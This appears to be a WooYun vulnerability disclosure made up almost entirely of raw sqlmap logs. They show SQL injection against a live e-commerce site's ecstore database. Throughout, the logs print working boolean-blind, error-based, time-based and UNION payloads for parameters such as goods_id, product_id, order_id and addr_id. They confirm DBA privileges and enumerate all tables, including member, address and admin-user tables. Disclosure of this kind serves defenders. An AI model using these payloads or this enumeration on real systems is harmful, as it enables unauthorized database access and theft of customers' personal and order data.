WooYun.org

sqlmap identified the following injection points with a total of 231 HTTP(s) req
uests:
---
Place: POST
Parameter: goods_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: goods_id=5371 AND 5139=5139&spec=2-24 28-389
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: goods_id=5371 AND (SELECT 8646 FROM(SELECT COUNT(*),CONCAT(0x716268
7a71,(SELECT (CASE WHEN (8646=8646) THEN 1 ELSE 0 END)),0x71666f6871,FLOOR(RAND(
0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&spec=2-24 28-389
---
[21:53:33] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.25
back-end DBMS: MySQL 5.0
[21:53:33] [INFO] fetching current user
[21:53:33] [INFO] retrieved: chen@%
current user:    'chen@%'
[21:53:33] [INFO] fetching current database
[21:53:33] [INFO] retrieved: ecstore
current database:    'ecstore'
[21:53:33] [INFO] testing if current user is DBA
[21:53:33] [INFO] fetching current user
current user is DBA:    True
available databases [5]:
[*] ecstore
[*] information_schema
[*] mysql
[*] performance_schema
[*] test
Database: ecstore
+---------------------------------+---------+
| Table                           | Entries |
+---------------------------------+---------+
| oct_product_price_snapshot      | 227857  |
| oct_cps_visit_log               | 153509  |
| oct_coupon_list                 | 82040   |
| sdb_image_image                 | 72442   |
| sdb_b2c_comment_goods_point     | 27465   |
| sdb_operatorlog_normallogs      | 21841   |
| oct_cps_log                     | 19392   |
| sdb_pam_members                 | 16330   |
| sdb_b2c_order_log               | 15534   |
| sdb_b2c_members                 | 14710   |
| sdb_image_image_attach          | 13288   |
| sdb_b2c_member_comments         | 12679   |
| sdb_desktop_tag_rel             | 11996   |
| sdb_b2c_order_items             | 10403   |
| sdb_b2c_order_objects           | 10375   |
| sdb_base_kvstore                | 9847    |
| sdb_dbeav_meta_value_text       | 9013    |
| sdb_pam_log_desktop             | 7949    |
| sdb_b2c_products                | 7435    |
| oct_verification_code           | 6610    |
| oct_member_point                | 6587    |
| oct_advertisement_items         | 5927    |
| sdb_b2c_member_coupon           | 5762    |
| sdb_ectools_analysis_logs       | 5758    |
| oct_member_wap_info             | 5717    |
| sdb_dbeav_meta_value_longtext   | 5594    |
| sdb_b2c_goods_keywords          | 5445    |
| oct_b2c_goods_spec_index        | 5344    |
| sdb_ectools_order_bills         | 5192    |
| sdb_b2c_goods                   | 5179    |
| sdb_ectools_payments            | 4788    |
| sdb_b2c_order_pmt               | 4688    |
| oct_member_weixin_bind          | 4687    |
| sdb_b2c_orders                  | 4677    |
| sdb_b2c_delivery_items          | 3888    |
| sdb_ectools_regions             | 3303    |
| sdb_b2c_member_addrs            | 3262    |
| sdb_order_task_log              | 3155    |
| oct_recommend_loaction          | 2752    |
| sdb_b2c_order_delivery          | 2569    |
| sdb_b2c_delivery                | 2564    |
| sdb_dbeav_meta_value_int        | 2315    |
| oct_member_weixin_bind3         | 2173    |
| oct_turn_table                  | 1975    |
| sdb_b2c_goods_type_props_value  | 1628    |
| sdb_b2c_goods_spec_index        | 1505    |
| sdb_couponlog_order_coupon_ref  | 1492    |
| sdb_couponlog_order_coupon_user | 1492    |
| sdb_b2c_cart_objects            | 1335    |
| sdb_apiactionlog_apilog         | 1304    |
| sdb_b2c_type_brand              | 1256    |
| sdb_desktop_recycle             | 1209    |
| oct_prompt_limit                | 947     |
| sdb_b2c_member_point            | 851     |
| sdb_base_app_content            | 784     |
| oct_search_words                | 719     |
| sdb_base_setting                | 705     |
| oct_banner_info                 | 671     |
| oct_banner_location             | 671     |
| sdb_b2c_member_goods            | 619     |
| sdb_base_cache_expires          | 615     |
| sdb_b2c_sell_logs               | 574     |
| sdb_b2c_spec_values             | 469     |
| sdb_starbuy_count_member_buy    | 437     |
| sdb_ectools_refunds             | 404     |
| sdb_logisticstrack_logistic_log | 367     |
| sdb_b2c_brand                   | 337     |
| sdb_importexport_task           | 322     |
| oct_draw_list                   | 320     |
| sdb_aftersales_return_product   | 318     |
| sdb_site_widgets_instance       | 312     |
| oct_advertisement               | 309     |
| sdb_b2c_goods_type_props        | 298     |
| oct_order_pmt                   | 277     |
| sdb_desktop_menus               | 258     |
| sdb_b2c_order_cancel_reason     | 237     |
| oct_sync_log                    | 214     |
| oct_cps_valuation               | 208     |
| oct_feedback                    | 205     |
| oct_coupon_order_item           | 187     |
| oct_brand_special               | 153     |
| oct_stores                      | 140     |
| oct_cps_put                     | 123     |
| oct_stores_image                | 99      |
| sdb_content_article_bodys       | 99      |
| oct_special_product             | 98      |
| sdb_dbeav_meta_value_varchar    | 97      |
| sdb_b2c_goods_cat               | 94      |
| sdb_b2c_goods_rate              | 93      |
| sdb_site_themes_file            | 89      |
| sdb_desktop_tag                 | 83      |
| sdb_operatorlog_register        | 79      |
| vw_goods_cat                    | 78      |
| sdb_b2c_goods_type              | 77      |
| sdb_b2c_goods_type_spec         | 74      |
| sdb_b2c_goods_lv_price          | 68      |
| sdb_content_article_indexs      | 68      |
| sdb_site_themes_tmpl            | 68      |
| sdb_site_widgets                | 62      |
| oct_service_call                | 58      |
| oct_cps_case                    | 52      |
| oct_coupon_cate                 | 49      |
| oct_coupon_rule                 | 49      |
| sdb_base_apps                   | 49      |
| sdb_desktop_hasrole             | 44      |
| sdb_desktop_users               | 44      |
| oct_prompt_flash                | 43      |
| sdb_pam_account                 | 43      |
| oct_coupon_grant                | 41      |
| sdb_starbuy_special_goods       | 41      |
| oct_banner_dimension            | 40      |
| oct_recommend_comment_cat       | 36      |
| sdb_b2c_goods_promotion_ref     | 34      |
| sdb_b2c_sales_rule_order        | 33      |
| sdb_b2c_dlycorp                 | 27      |
| sdb_b2c_goods_virtual_cat       | 27      |
| sdb_b2c_member_systmpl          | 26      |
| sdb_site_modules                | 25      |
| sdb_b2c_coupons                 | 21      |
| sdb_b2c_specification           | 20      |
| oct_recommend_dimension         | 17      |
| sdb_openid_openid               | 17      |
| sdb_pam_auth                    | 17      |
| sdb_system_queue_mysql          | 17      |
| sdb_wap_modules                 | 17      |
| sdb_dbeav_meta_register         | 16      |
| sdb_desktop_roles               | 16      |
| sdb_desktop_filter              | 15      |
| sdb_starbuy_promotions_type     | 15      |
| oct_recommend_comment_define    | 12      |
| sdb_base_crontab                | 12      |
| sdb_wap_widgets                 | 12      |
| oct_recommend_comment_info      | 10      |
| sdb_b2c_member_advance          | 9       |
| sdb_content_article_nodes       | 9       |
| oct_search_hot                  | 8       |
| sdb_b2c_member_lv               | 8       |
| sdb_starbuy_special             | 8       |
| oct_special_info                | 7       |
| sdb_site_seo                    | 7       |
| sdb_b2c_reship_items            | 6       |
| sdb_gift_ref                    | 6       |
| sdb_site_menus                  | 6       |
| oct_channel                     | 5       |
| oct_employees                   | 5       |
| oct_goods_seckill               | 5       |
| oct_prompt_activity             | 5       |
| sdb_site_themes                 | 5       |
| sdb_wap_widgets_instance        | 5       |
| oct_admin_group                 | 4       |
| sdb_b2c_dlytype                 | 4       |
| sdb_b2c_reship                  | 4       |
| sdb_starbuy_special_remind      | 4       |
| oct_location                    | 3       |
| sdb_b2c_comment_goods_type      | 3       |
| sdb_base_network                | 3       |
| sdb_ectools_analysis            | 3       |
| oct_agent                       | 2       |
| sdb_b2c_orders_recommend        | 2       |
| sdb_wap_themes_file             | 2       |
| sdb_wap_themes_tmpl             | 2       |
| oct_goods_ads                   | 1       |
| sdb_b2c_goods_store_prompt      | 1       |
| sdb_ectools_currency            | 1       |
| sdb_gift_cat                    | 1       |
| sdb_site_explorers              | 1       |
| sdb_site_link                   | 1       |
| sdb_wap_explorers               | 1       |
| sdb_wap_themes                  | 1       |
+---------------------------------+---------+
| sdb_pam_members                 | 16330   |
| sdb_b2c_members                 | 14710   |
| sdb_b2c_member_addrs            | 3262    |
| sdb_desktop_users               | 44      |
| sdb_couponlog_order_coupon_user | 1492    |

sqlmap identified the following injection points with a total of 152 HTTP(s) req
uests:
---
Place: POST
Parameter: product_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: product_id=9223 AND 3883=3883&buy_number=2
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: product_id=9223 AND (SELECT 7492 FROM(SELECT COUNT(*),CONCAT(0x7177
637671,(SELECT (CASE WHEN (7492=7492) THEN 1 ELSE 0 END)),0x7174636d71,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&buy_number=2
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: product_id=9223 AND SLEEP(5)&buy_number=2
---
[19:44:11] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.25
back-end DBMS: MySQL 5.0
[19:44:11] [INFO] fetching current user
[19:44:11] [INFO] retrieved: chen@%
current user:    'chen@%'
[19:44:11] [INFO] fetching current database
[19:44:12] [INFO] retrieved: ecstore
current database:    'ecstore'
[19:44:12] [INFO] testing if current user is DBA
[19:44:12] [INFO] fetching current user
current user is DBA:    True

[19:46:55] [INFO] testing connection to the target URL
[19:46:56] [INFO] heuristics detected web page charset 'ascii'
[19:46:56] [INFO] testing if the target URL is stable. This can take a couple of
 seconds
[19:46:57] [WARNING] target URL is not stable. sqlmap will base the page compari
son on a sequence matcher. If no dynamic nor injectable parameters are detected,
 or in case of junk results, refer to user's manual paragraph 'Page comparison'
and provide a string or regular expression to match on
how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit]
[19:47:03] [INFO] searching for dynamic content
[19:47:03] [INFO] dynamic content marked for removal (1 region)
[19:47:03] [INFO] testing if POST parameter 'product_id' is dynamic
[19:47:03] [INFO] confirming that POST parameter 'product_id' is dynamic
[19:47:04] [WARNING] POST parameter 'product_id' does not appear dynamic
[19:47:04] [INFO] heuristic (basic) test shows that POST parameter 'product_id'
might be injectable (possible DBMS: 'MySQL')
[19:47:04] [INFO] testing for SQL injection on POST parameter 'product_id'
[19:47:04] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:47:04] [WARNING] reflective value(s) found and filtering out
[19:47:05] [INFO] POST parameter 'product_id' seems to be 'AND boolean-based bli
nd - WHERE or HAVING clause' injectable
[19:47:05] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[19:47:05] [INFO] POST parameter 'product_id' is 'MySQL >= 5.0 AND error-based -
 WHERE or HAVING clause' injectable
[19:47:05] [INFO] testing 'MySQL inline queries'
[19:47:05] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:47:05] [WARNING] time-based comparison needs larger statistical model. Makin
g a few dummy requests, please wait..
[19:47:06] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:47:16] [INFO] POST parameter 'product_id' seems to be 'MySQL > 5.0.11 AND ti
me-based blind' injectable
[19:47:16] [INFO] testing 'MySQL UNION query (NULL) - 1 to 20 columns'
[19:47:16] [INFO] automatically extending ranges for UNION query injection techn
ique tests as there is at least one other (potential) technique found
[19:47:19] [INFO] target URL appears to be UNION injectable with 3 columns
injection not exploitable with NULL values. Do you want to try with a random int
eger value for option '--union-char'? [Y/n]
[19:47:23] [INFO] testing 'Generic UNION query (95) - 1 to 20 columns'
POST parameter 'product_id' is vulnerable. Do you want to keep testing the other
s (if any)? [y/N] y
[19:47:30] [INFO] testing if POST parameter 'quantity' is dynamic
[19:47:30] [INFO] confirming that POST parameter 'quantity' is dynamic
[19:47:30] [INFO] POST parameter 'quantity' is dynamic
[19:47:30] [INFO] heuristic (basic) test shows that POST parameter 'quantity' mi
ght be injectable (possible DBMS: 'MySQL')
[19:47:30] [INFO] testing for SQL injection on POST parameter 'quantity'
[19:47:31] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:47:33] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[19:47:34] [INFO] testing 'MySQL inline queries'
[19:47:34] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:47:36] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:47:37] [INFO] testing 'MySQL UNION query (95) - 1 to 10 columns'
[19:47:58] [INFO] testing 'Generic UNION query (95) - 1 to 10 columns'
[19:48:11] [WARNING] POST parameter 'quantity' is not injectable
[19:48:11] [INFO] testing if POST parameter 'quantity_type' is dynamic
[19:48:11] [INFO] confirming that POST parameter 'quantity_type' is dynamic
[19:48:11] [WARNING] POST parameter 'quantity_type' does not appear dynamic
[19:48:11] [INFO] testing for SQL injection on POST parameter 'quantity_type'
[19:48:11] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
[19:48:13] [INFO] testing 'MySQL >= 5.0 AND error-based - WHERE or HAVING clause
'
[19:48:14] [INFO] testing 'MySQL inline queries'
[19:48:14] [INFO] testing 'MySQL > 5.0.11 stacked queries'
[19:48:15] [INFO] testing 'MySQL > 5.0.11 AND time-based blind'
[19:48:16] [INFO] testing 'MySQL UNION query (95) - 1 to 10 columns'
[19:48:34] [INFO] testing 'Generic UNION query (95) - 1 to 10 columns'
[19:48:50] [WARNING] POST parameter 'quantity_type' is not injectable
sqlmap identified the following injection points with a total of 404 HTTP(s) req
uests:
---
Place: POST
Parameter: product_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: product_id=9222 AND 5197=5197&quantity=2&quantity_type=add
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: product_id=9222 AND (SELECT 7879 FROM(SELECT COUNT(*),CONCAT(0x7170
706771,(SELECT (CASE WHEN (7879=7879) THEN 1 ELSE 0 END)),0x716e676171,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&quantity=2&quanti
ty_type=add
    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: product_id=9222 AND SLEEP(5)&quantity=2&quantity_type=add
---
[19:48:51] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.25
back-end DBMS: MySQL 5.0
[19:48:51] [INFO] fetching current user
[19:48:51] [INFO] retrieved: chen@%
current user:    'chen@%'
[19:48:51] [INFO] fetching current database
[19:48:51] [INFO] retrieved: ecstore
current database:    'ecstore'
[19:48:51] [INFO] testing if current user is DBA
[19:48:51] [INFO] fetching current user
current user is DBA:    True

[19:53:02] [WARNING] GET parameter 'quantity' is not injectable
sqlmap identified the following injection points with a total of 350 HTTP(s) req
uests:
---
Place: GET
Parameter: product_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: product_id=9222 AND 4688=4688&quantity=2
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: product_id=9222 AND (SELECT 3460 FROM(SELECT COUNT(*),CONCAT(0x7162
786c71,(SELECT (CASE WHEN (3460=3460) THEN 1 ELSE 0 END)),0x71656d6271,FLOOR(RAN
D(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&quantity=2
    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: product_id=-4908 UNION ALL SELECT NULL,NULL,NULL,CONCAT(0x7162786c7
1,0x4b43476d754b62487872,0x71656d6271),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&
quantity=2
---
[19:53:02] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.25
back-end DBMS: MySQL 5.0
[19:53:02] [INFO] fetching current user
current user:    'chen@%'
[19:53:02] [INFO] fetching current database
current database:    'ecstore'
[19:53:03] [INFO] testing if current user is DBA
[19:53:03] [INFO] fetching current user
current user is DBA:    True

sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: goods
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: goods=5371 AND 7381=7381&prodct=9222.html
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: goods=5371 AND (SELECT 1047 FROM(SELECT COUNT(*),CONCAT(0x716d75647
1,(SELECT (CASE WHEN (1047=1047) THEN 1 ELSE 0 END)),0x71726d7771,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&prodct=9222.html
---
[10:47:54] [INFO] testing MySQL
[10:47:54] [INFO] confirming MySQL
you provided a HTTP Cookie header value. The target URL provided its own cookies
 within the HTTP Set-Cookie header which intersect with yours. Do you want to me
rge them in futher requests? [Y/n] n
[10:48:58] [WARNING] reflective value(s) found and filtering out
[10:48:58] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.25
back-end DBMS: MySQL >= 5.0.0
[10:48:58] [INFO] fetching current user
[10:49:59] [INFO] retrieved: chen@%
current user:    'chen@%'
[10:49:59] [INFO] fetching current database
[10:50:59] [INFO] retrieved: ecstore
current database:    'ecstore'
[10:50:59] [INFO] testing if current user is DBA
[10:50:59] [INFO] fetching current user
current user is DBA:    True

[13:50:22] [INFO] GET parameter 'order_id' is 'MySQL UNION query (NULL) - 1 to 2
0 columns' injectable
GET parameter 'order_id' is vulnerable. Do you want to keep testing the others (
if any)? [y/N] N
sqlmap identified the following injection points with a total of 47 HTTP(s) requ
ests:
---
Place: GET
Parameter: order_id
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: order_id=150125210459821) AND (SELECT 8618 FROM(SELECT COUNT(*),CON
CAT(0x717a727771,(SELECT (CASE WHEN (8618=8618) THEN 1 ELSE 0 END)),0x7165657571
,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND (56
15=5615
    Type: UNION query
    Title: MySQL UNION query (NULL) - 12 columns
    Payload: order_id=150125210459821) UNION ALL SELECT NULL,NULL,CONCAT(0x717a7
27771,0x4b494c5855476370726c,0x7165657571),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NU
LL,NULL#
---
[13:56:09] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.25
back-end DBMS: MySQL 5.0
[13:56:09] [INFO] fetching current user
current user:    'chen@%'
[13:57:18] [INFO] fetching current database
current database:    'ecstore'
[13:58:20] [INFO] testing if current user is DBA
[13:58:20] [INFO] fetching current user
current user is DBA:    True

GET parameter 'addr_id' is vulnerable. Do you want to keep testing the others (i
f any)? [y/N] n
sqlmap identified the following injection points with a total of 88 HTTP(s) requ
ests:
---
Place: GET
Parameter: addr_id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: addr_id=79 AND 6350=6350
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: addr_id=79 AND (SELECT 7293 FROM(SELECT COUNT(*),CONCAT(0x71616b647
1,(SELECT (CASE WHEN (7293=7293) THEN 1 ELSE 0 END)),0x716a7a6471,FLOOR(RAND(0)*
2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[16:02:40] [INFO] the back-end DBMS is MySQL
web application technology: PHP 5.3.25
back-end DBMS: MySQL 5.0
[16:02:40] [INFO] fetching current user
[16:03:40] [INFO] retrieved: chen@%
current user:    'chen@%'
[16:03:40] [INFO] fetching current database
[16:04:50] [INFO] retrieved: ecstore
current database:    'ecstore'
[16:04:50] [INFO] testing if current user is DBA
[16:04:50] [INFO] fetching current user
[16:06:09] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
[16:07:29] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is go
ing to retry the request
current user is DBA:    True